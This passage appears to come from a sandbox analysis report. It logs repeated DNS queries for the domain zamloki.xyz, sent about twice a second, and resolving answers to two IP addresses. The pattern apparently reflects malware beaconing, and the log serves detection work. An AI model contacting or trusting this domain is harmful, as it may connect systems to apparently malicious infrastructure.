                                    Jul 21, 2021 17:01:48.889821053 CEST192.168.2.38.8.8.80x1ae9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:49.480160952 CEST192.168.2.38.8.8.80x276fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:50.053246021 CEST192.168.2.38.8.8.80x7e31Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:50.619071007 CEST192.168.2.38.8.8.80xfc8eStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:51.244555950 CEST192.168.2.38.8.8.80x94ebStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:51.822704077 CEST192.168.2.38.8.8.80xcb04Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:52.435712099 CEST192.168.2.38.8.8.80x54cdStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:52.944956064 CEST192.168.2.38.8.8.80x1483Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:53.504734039 CEST192.168.2.38.8.8.80xd5f8Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:54.058327913 CEST192.168.2.38.8.8.80x9121Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:54.596539021 CEST192.168.2.38.8.8.80x3e28Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:55.133639097 CEST192.168.2.38.8.8.80x539aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:55.830039978 CEST192.168.2.38.8.8.80x5910Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:56.351608992 CEST192.168.2.38.8.8.80x4042Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:57.114506006 CEST192.168.2.38.8.8.80x98a3Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:58.566900015 CEST192.168.2.38.8.8.80xf87cStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:59.119703054 CEST192.168.2.38.8.8.80x89afStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:59.720536947 CEST192.168.2.38.8.8.80x3013Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:00.251041889 CEST192.168.2.38.8.8.80x60d4Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:00.995995998 CEST192.168.2.38.8.8.80x70fbStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:01.535348892 CEST192.168.2.38.8.8.80x23deStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:02.096215010 CEST192.168.2.38.8.8.80xf312Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:02.683379889 CEST192.168.2.38.8.8.80x398aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:03.246648073 CEST192.168.2.38.8.8.80xe263Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:04.097815037 CEST192.168.2.38.8.8.80x8e20Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:04.665661097 CEST192.168.2.38.8.8.80x8521Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:05.191314936 CEST192.168.2.38.8.8.80xdcc0Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:05.793621063 CEST192.168.2.38.8.8.80x9095Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:06.329431057 CEST192.168.2.38.8.8.80x2652Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:06.854964018 CEST192.168.2.38.8.8.80xe3b5Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:07.408443928 CEST192.168.2.38.8.8.80x4ff3Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:07.953702927 CEST192.168.2.38.8.8.80x9976Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:08.572448015 CEST192.168.2.38.8.8.80x7b3fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:09.141120911 CEST192.168.2.38.8.8.80xc9c4Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:09.644927979 CEST192.168.2.38.8.8.80x21ddStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:10.208210945 CEST192.168.2.38.8.8.80x5af5Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:10.780577898 CEST192.168.2.38.8.8.80x9558Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:11.308162928 CEST192.168.2.38.8.8.80x8e6fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:11.884574890 CEST192.168.2.38.8.8.80x1031Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:12.439172983 CEST192.168.2.38.8.8.80x4a9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:13.125791073 CEST192.168.2.38.8.8.80xf6eStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:13.677805901 CEST192.168.2.38.8.8.80xcd59Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:14.196557999 CEST192.168.2.38.8.8.80xfcf8Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:14.789940119 CEST192.168.2.38.8.8.80x5813Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:15.302637100 CEST192.168.2.38.8.8.80x92a2Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:15.851584911 CEST192.168.2.38.8.8.80xa8eaStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:16.365945101 CEST192.168.2.38.8.8.80x662dStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:16.930565119 CEST192.168.2.38.8.8.80xf8caStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:17.545233965 CEST192.168.2.38.8.8.80x8796Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:18.076618910 CEST192.168.2.38.8.8.80xe059Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:18.653898001 CEST192.168.2.38.8.8.80x8de0Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:19.171133995 CEST192.168.2.38.8.8.80xbc62Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:19.683083057 CEST192.168.2.38.8.8.80x84c1Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:20.830728054 CEST192.168.2.38.8.8.80x313aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:21.655255079 CEST192.168.2.38.8.8.80xa41aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:22.289550066 CEST192.168.2.38.8.8.80x99e1Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:22.831556082 CEST192.168.2.38.8.8.80x4648Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:23.369633913 CEST192.168.2.38.8.8.80xabafStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:23.885278940 CEST192.168.2.38.8.8.80x49deStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:24.516382933 CEST192.168.2.38.8.8.80x8995Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:25.049319983 CEST192.168.2.38.8.8.80x67d4Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:25.536776066 CEST192.168.2.38.8.8.80xcc31Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:26.029680967 CEST192.168.2.38.8.8.80xeedcStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:26.611677885 CEST192.168.2.38.8.8.80x7cb9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:27.105567932 CEST192.168.2.38.8.8.80xa59dStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:27.584485054 CEST192.168.2.38.8.8.80x5ad6Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:28.098438978 CEST192.168.2.38.8.8.80x6204Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:28.577903032 CEST192.168.2.38.8.8.80xdf75Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:29.084666967 CEST192.168.2.38.8.8.80x6fa4Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:29.556833029 CEST192.168.2.38.8.8.80x31cfStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:30.181942940 CEST192.168.2.38.8.8.80x207cStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:30.677241087 CEST192.168.2.38.8.8.80xc771Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:31.316437006 CEST192.168.2.38.8.8.80xac6aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:31.903207064 CEST192.168.2.38.8.8.80x4925Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:32.385659933 CEST192.168.2.38.8.8.80x4ce6Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:32.845619917 CEST192.168.2.38.8.8.80x9f9aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:33.373795033 CEST192.168.2.38.8.8.80x6c5Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:33.836728096 CEST192.168.2.38.8.8.80x1c51Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:34.348006010 CEST192.168.2.38.8.8.80x5368Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:34.871051073 CEST192.168.2.38.8.8.80x53bbStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:35.417689085 CEST192.168.2.38.8.8.80x1f89Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:35.918569088 CEST192.168.2.38.8.8.80x8eceStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:36.734096050 CEST192.168.2.38.8.8.80x1ef3Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:37.226911068 CEST192.168.2.38.8.8.80x2939Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:37.833092928 CEST192.168.2.38.8.8.80xad79Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:38.318547964 CEST192.168.2.38.8.8.80xd558Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:38.808774948 CEST192.168.2.38.8.8.80x6232Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:39.421036959 CEST192.168.2.38.8.8.80x5daaStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:39.926208973 CEST192.168.2.38.8.8.80x4c88Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:40.398852110 CEST192.168.2.38.8.8.80xa869Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:40.924561024 CEST192.168.2.38.8.8.80x1f83Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:41.513676882 CEST192.168.2.38.8.8.80x2fb7Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:42.003951073 CEST192.168.2.38.8.8.80x7f63Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:42.496783972 CEST192.168.2.38.8.8.80xa7b7Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:42.991158962 CEST192.168.2.38.8.8.80xb5e5Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:43.504390001 CEST192.168.2.38.8.8.80x948aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.244338989 CEST192.168.2.38.8.8.80x65c1Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.874399900 CEST192.168.2.38.8.8.80x61abStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:45.831178904 CEST192.168.2.38.8.8.80xabeaStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:47.472624063 CEST192.168.2.38.8.8.80x3c67Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.016567945 CEST192.168.2.38.8.8.80xea46Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.573681116 CEST192.168.2.38.8.8.80x99efStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.164589882 CEST192.168.2.38.8.8.80xe5efStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.767065048 CEST192.168.2.38.8.8.80x795aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:50.454210043 CEST192.168.2.38.8.8.80x5561Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.105921030 CEST192.168.2.38.8.8.80x3981Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.581773996 CEST192.168.2.38.8.8.80x5ffdStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.184186935 CEST192.168.2.38.8.8.80x7828Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.971012115 CEST192.168.2.38.8.8.80x32eaStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:53.458677053 CEST192.168.2.38.8.8.80x8182Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.018378973 CEST192.168.2.38.8.8.80x68c9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.546286106 CEST192.168.2.38.8.8.80x6d71Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.047826052 CEST192.168.2.38.8.8.80x20fdStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.595923901 CEST192.168.2.38.8.8.80xef86Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.135963917 CEST192.168.2.38.8.8.80xa089Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.648803949 CEST192.168.2.38.8.8.80xef9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.161147118 CEST192.168.2.38.8.8.80xc904Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.656636953 CEST192.168.2.38.8.8.80x2c5eStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.155379057 CEST192.168.2.38.8.8.80x769Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.721405983 CEST192.168.2.38.8.8.80x5a80Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.263781071 CEST192.168.2.38.8.8.80x95ddStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.845005989 CEST192.168.2.38.8.8.80x5681Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.439763069 CEST192.168.2.38.8.8.80x176bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.962069035 CEST192.168.2.38.8.8.80x26daStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:01.614067078 CEST192.168.2.38.8.8.80x7c77Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.135927916 CEST192.168.2.38.8.8.80xcb7bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:02.735625982 CEST192.168.2.38.8.8.80xa7abStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.275046110 CEST192.168.2.38.8.8.80xd493Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:03.922496080 CEST192.168.2.38.8.8.80x7c6aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:04.469043970 CEST192.168.2.38.8.8.80x9873Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.002077103 CEST192.168.2.38.8.8.80xcafeStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:05.525885105 CEST192.168.2.38.8.8.80x5fd9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.172590971 CEST192.168.2.38.8.8.80x957bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:06.739574909 CEST192.168.2.38.8.8.80xfcc3Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:07.224699974 CEST192.168.2.38.8.8.80xb09fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jul 21, 2021 17:01:47.820369959 CEST8.8.8.8192.168.2.30xfd7bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:47.820369959 CEST8.8.8.8192.168.2.30xfd7bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:48.460391045 CEST8.8.8.8192.168.2.30xd17bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:48.460391045 CEST8.8.8.8192.168.2.30xd17bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:48.918628931 CEST8.8.8.8192.168.2.30x1ae9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:48.918628931 CEST8.8.8.8192.168.2.30x1ae9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:49.493999004 CEST8.8.8.8192.168.2.30x276fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:49.493999004 CEST8.8.8.8192.168.2.30x276fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:50.080837011 CEST8.8.8.8192.168.2.30x7e31No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:50.080837011 CEST8.8.8.8192.168.2.30x7e31No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:50.659485102 CEST8.8.8.8192.168.2.30xfc8eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:50.659485102 CEST8.8.8.8192.168.2.30xfc8eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:51.259856939 CEST8.8.8.8192.168.2.30x94ebNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:51.259856939 CEST8.8.8.8192.168.2.30x94ebNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:51.840864897 CEST8.8.8.8192.168.2.30xcb04No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:51.840864897 CEST8.8.8.8192.168.2.30xcb04No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:52.450843096 CEST8.8.8.8192.168.2.30x54cdNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:52.450843096 CEST8.8.8.8192.168.2.30x54cdNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:52.959090948 CEST8.8.8.8192.168.2.30x1483No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:52.959090948 CEST8.8.8.8192.168.2.30x1483No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:53.517739058 CEST8.8.8.8192.168.2.30xd5f8No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:53.517739058 CEST8.8.8.8192.168.2.30xd5f8No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:54.071849108 CEST8.8.8.8192.168.2.30x9121No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:54.071849108 CEST8.8.8.8192.168.2.30x9121No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:54.609664917 CEST8.8.8.8192.168.2.30x3e28No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:54.609664917 CEST8.8.8.8192.168.2.30x3e28No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:55.147244930 CEST8.8.8.8192.168.2.30x539aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:55.147244930 CEST8.8.8.8192.168.2.30x539aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:55.845146894 CEST8.8.8.8192.168.2.30x5910No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:55.845146894 CEST8.8.8.8192.168.2.30x5910No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:56.364475012 CEST8.8.8.8192.168.2.30x4042No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:56.364475012 CEST8.8.8.8192.168.2.30x4042No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:57.127418995 CEST8.8.8.8192.168.2.30x98a3No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:57.127418995 CEST8.8.8.8192.168.2.30x98a3No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:58.579528093 CEST8.8.8.8192.168.2.30xf87cNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:58.579528093 CEST8.8.8.8192.168.2.30xf87cNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:59.136631012 CEST8.8.8.8192.168.2.30x89afNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:59.136631012 CEST8.8.8.8192.168.2.30x89afNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:59.734105110 CEST8.8.8.8192.168.2.30x3013No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:59.734105110 CEST8.8.8.8192.168.2.30x3013No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:00.264766932 CEST8.8.8.8192.168.2.30x60d4No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:00.264766932 CEST8.8.8.8192.168.2.30x60d4No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:01.011358976 CEST8.8.8.8192.168.2.30x70fbNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:01.011358976 CEST8.8.8.8192.168.2.30x70fbNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:01.547601938 CEST8.8.8.8192.168.2.30x23deNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:01.547601938 CEST8.8.8.8192.168.2.30x23deNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:02.109075069 CEST8.8.8.8192.168.2.30xf312No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:02.109075069 CEST8.8.8.8192.168.2.30xf312No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:02.697212934 CEST8.8.8.8192.168.2.30x398aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:02.697212934 CEST8.8.8.8192.168.2.30x398aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:03.259548903 CEST8.8.8.8192.168.2.30xe263No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:03.259548903 CEST8.8.8.8192.168.2.30xe263No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:04.110651016 CEST8.8.8.8192.168.2.30x8e20No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:04.110651016 CEST8.8.8.8192.168.2.30x8e20No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:04.678721905 CEST8.8.8.8192.168.2.30x8521No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:04.678721905 CEST8.8.8.8192.168.2.30x8521No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:05.204798937 CEST8.8.8.8192.168.2.30xdcc0No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:05.204798937 CEST8.8.8.8192.168.2.30xdcc0No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:05.806677103 CEST8.8.8.8192.168.2.30x9095No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:05.806677103 CEST8.8.8.8192.168.2.30x9095No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:06.342366934 CEST8.8.8.8192.168.2.30x2652No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:06.342366934 CEST8.8.8.8192.168.2.30x2652No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:06.867717981 CEST8.8.8.8192.168.2.30xe3b5No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:06.867717981 CEST8.8.8.8192.168.2.30xe3b5No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
